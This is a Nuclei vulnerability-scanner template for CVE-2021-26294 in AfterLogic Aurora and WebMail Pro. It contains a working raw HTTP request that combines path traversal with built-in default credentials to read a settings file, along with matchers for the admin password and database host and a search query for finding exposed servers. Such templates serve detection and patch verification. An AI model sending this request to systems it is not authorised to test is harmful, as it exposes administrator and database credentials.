nuclei-templates/http/cves/2021/CVE-2021-26294.yaml

56 lines
2.0 KiB
YAML
Raw Blame History

This file contains ambiguous Unicode characters!

This file contains ambiguous Unicode characters that may be confused with others in your current locale. If your use case is intentional and legitimate, you can safely ignore this warning. Use the Escape button to highlight these characters.

id: CVE-2021-26294
info:
name: AfterLogic Aurora and WebMail Pro < 7.7.9 - Information Disclosure
author: johnk3r
severity: high
description: |
AfterLogic Aurora and WebMail Pro products with 7.7.9 and all lower versions are affected by this vulnerability, simply sending an HTTP GET request to WebDAV EndPoint with built-in “caldav_public_user@localhost” and its the predefined password “caldav_public_user” allows the attacker to read all files under the web root.
reference:
- https://github.com/E3SEC/AfterLogic/blob/main/CVE-2021-26294-exposure-of-sensitive-information-vulnerability.md
- https://nvd.nist.gov/vuln/detail/CVE-2021-26294
- https://github.com/Threekiii/Awesome-POC
- https://github.com/soosmile/POC
- https://github.com/tzwlhack/Vulnerability
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2021-26294
cwe-id: CWE-22
epss-score: 0.25543
epss-percentile: 0.96591
cpe: cpe:2.3:a:afterlogic:aurora:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: afterlogic
product: aurora
fofa-query: "X-Server: AfterlogicDAVServer"
tags: cve2021,cve,afterlogic,exposure,AfterLogic
http:
- raw:
- |
GET /dav/server.php/files/personal/%2e%2e/%2e%2e//%2e%2e//%2e%2e/data/settings/settings.xml HTTP/1.1
Host: {{Hostname}}
Authorization: Basic Y2FsZGF2X3B1YmxpY191c2VyQGxvY2FsaG9zdDpjYWxkYXZfcHVibGljX3VzZXI
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<AdminLogin>"
- "<AdminPassword>"
- "<DBHost>"
condition: and
- type: word
part: header
words:
- "application/octet-stream"
- type: status
status:
- 200
# digest: 4b0a00483046022100946db71c9c0e5b872bed57665de3060aba3d7e263f8bb7d763c03046709ab78a022100a5715e19435bd033d5da6cc980eceb717e143e184e8342d77f893624fec063a0:922c64590222798bb761d5b6d8e72950